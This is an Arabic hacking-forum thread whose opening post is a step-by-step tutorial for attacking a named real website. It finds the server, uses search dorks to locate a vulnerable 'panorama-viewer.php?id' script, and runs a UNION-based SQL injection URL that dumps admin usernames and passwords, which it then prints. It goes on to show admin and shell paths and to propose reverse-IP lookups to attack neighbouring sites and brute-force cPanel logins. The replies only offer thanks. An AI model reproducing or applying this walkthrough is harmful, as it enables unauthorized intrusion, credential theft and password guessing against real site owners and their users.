التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-13-2011, 02:47 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية b10001
 

 

 
إحصائية العضو







b10001 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
b10001 is on a distinguished road

.................... حصريا : استهداف موقع و اكتشاف ثغرات ثم استخراج السيرفر و المواقع التابعة و استهدافها و استخراج اليوزرات و التخمين علي السي بانل




الدرس الاول استهداف الموقع و استخراج السيرفر

كود PHP:
http://mckitchens.com/ 
الموقع المستهدف نستخرج السيرفر من عدة مواقع منها
كود PHP:
www.whois.net/
www.raynette.fr/services/whois/
whois.domaintools.com
www.whois.sc
نستعمل موقع هذا احسن لنخرج السيرفر

كود PHP:
news.netcraft.com
نكتب الموقع علي الشكل التالي

كود PHP:
mckitchens.com 
ثم نظغط علي raport

السيرفر هو

كود PHP:
IP address    209.234.251.93    Site rank    201
Country     US    Nameserver    ns1
.drudgereport.com
Date first seen    April 1997    DNS admin    __hostmaster
@drudgereport.com
Domain Registrar    networksolutions
.com    Reverse DNS    unknown
Organisation    Drudge
MattPO Box 459ATTN DRUDGEREPORT.COMcare of Network SolutionsDrumsPanama    Nameserver Organisation    DrudgeMattPO Box 459ATTN DRUDGEREPORT.COMcare of Network SolutionsDrumsPanama 
كود PHP:
 209.234.251.93 

الدرس الثاني اكتشاف الثغرات في الموقع

اول شي نروح لل

كود PHP:
Bing.com 
نكتب كما موجود للبحث عن الثغرات مع اني كنت اتصفح فلموقع فلقيت سكريبت

كود PHP:
panorama-viewer.php?id
يعني سنبحث عن ثغرات SQL injection

نكتب شبه دورك

كود PHP:
inurl:"panorama-viewer.php?id=" 
سنجد كثير مواقع منها موقعنا اي يعني انه مصاب اوكي عملنا كل شي الا الاستغلال

روح لموقع ثغرات نكتب

كود PHP:
exploit-db.com 
كود PHP:
chercher inurl:"panorama-viewer.php?id=" 
يعني طلعتلنا الثغرة


الدرس الثالث اختراق الموقع

اوكي الدورك هنا

كود PHP:
Google searchinurl:panorama-viewer.php?id
الاستغلال

كود PHP:
http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--


[-] http://server/adm/users.php

[-] http://server/adm/panorama_edit.php?id=1

[-] http://server/listimages/shell.php 
الموقع المستهدف

كود PHP:
http://mckitchens.com/panorama-viewer.php?id=1 
تم الاختراق

كود PHP:
http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users-- 
معلومات الادمين

كود PHP:
JOHNZ3CABN:MCKMIS89A3F,GINNYUZ3R:*P255W0RD407 

الدرس الرابع استخراج مواقع السيرفر
كود PHP:
http://www.yougetsignal.com/tools/web-sites-on-web-server/ 
الموقع يخرج مواقع السيرفر و انت طبق عليهم الثفرة
ثم نفتح الnotepad

نضع المواقع و نحذف منها com net org etc

نسجل الملف تيكست نصي ونفتحه بالmicrosoft accés

نضع الموشر في الثمانين

مبروك عليك اليوزرات ثم خمن علي السي بانل

تحياتي لكم يا عناكب





pwvdh : hsji]ht l,ru , h;jaht eyvhj el hsjovh[ hgsdvtv hgl,hru hgjhfum hsji]htih hgd,.vhj

التوقيع

http://img198.imageshack.us/img198/1722/sansredrh.jpg

http://im16.gulfup.com/2011-10-15/131870922211.gif
[SIZE="7"][COLOR="Lime"]

 

   

رد مع اقتباس
قديم 12-30-2011, 08:39 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو






haCk3erFoREv3er غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
haCk3erFoREv3er is on a distinguished road

افتراضي رد: حصريا : استهداف موقع و اكتشاف ثغرات ثم استخراج السيرفر و المواقع التابعة و استهدافها و استخراج اليوزرات و التخمين علي السي بانل


موفق اخوي

   

رد مع اقتباس
قديم 03-06-2012, 01:07 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Spire_Barde
 

 

 
إحصائية العضو






Spire_Barde غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Spire_Barde is on a distinguished road

افتراضي رد: حصريا : استهداف موقع و اكتشاف ثغرات ثم استخراج السيرفر و المواقع التابعة و استهدافها و استخراج اليوزرات و التخمين علي السي بانل


شكرا أخي

التوقيع

شكرا لطاقم الادارة الذي استجاب لتلبية طلبي و غير اسم عضويتي الى: Spire_Barde

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:34 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0